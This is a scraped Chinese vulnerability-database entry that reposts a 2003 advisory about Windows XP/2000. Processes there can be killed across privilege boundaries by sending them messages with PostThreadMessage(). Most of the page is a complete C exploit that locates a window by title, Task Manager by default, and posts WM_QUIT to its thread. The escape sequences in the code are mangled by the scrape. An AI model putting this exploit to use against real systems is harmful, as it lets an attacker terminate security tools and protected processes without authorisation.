Microsoft Windows XP/2000 – PostThreadMessage() Arbitrary Process Killing
| 漏洞ID | 1054205 | 漏洞类型 | |
| 发布时间 | 2003-10-02 | 更新时间 | 2003-10-02 |
CVE编号
|
N/A |
CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8747/info
A vulnerability has been discovered in the Microsoft Windows operating system. The flaw lies in the way that processes handle messages sent from another process via the PostThreadMessage() API call. Reports indicate that, if a running process has a message queue and is sent one of 3 different messages, the process may terminate. This termination will occur despite any security level differences between processes, as well as any safe guards to prevent this behaviour, such as requiring a password before the process is killed.
This issue likely occurs due to a design error, specifically failing to ensure that process verifies the origin of messages recieved via the PostThreadMessage() API call.
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd,proc;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessagen");
printf("%% [email protected]");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;
printf("+ Finding %s Window...n",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Windown",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xhn",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(hWnd,&proc);
if(hThread == NULL)
{
printf("Failedn");
return 0;
}
printf("0x%xh Process 0x%xhn",hThread,proc);
printf("+ Send Quit Messagen");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...n");
return 0;
}
相关推荐: CSM Mailserver HELO Buffer Overflow Vulnerability
CSM Mailserver HELO Buffer Overflow Vulnerability 漏洞ID 1104439 漏洞类型 Boundary Condition Error 发布时间 1999-12-29 更新时间 1999-12-29 CVE编号…
正文完
CVE编号
CNNVD-ID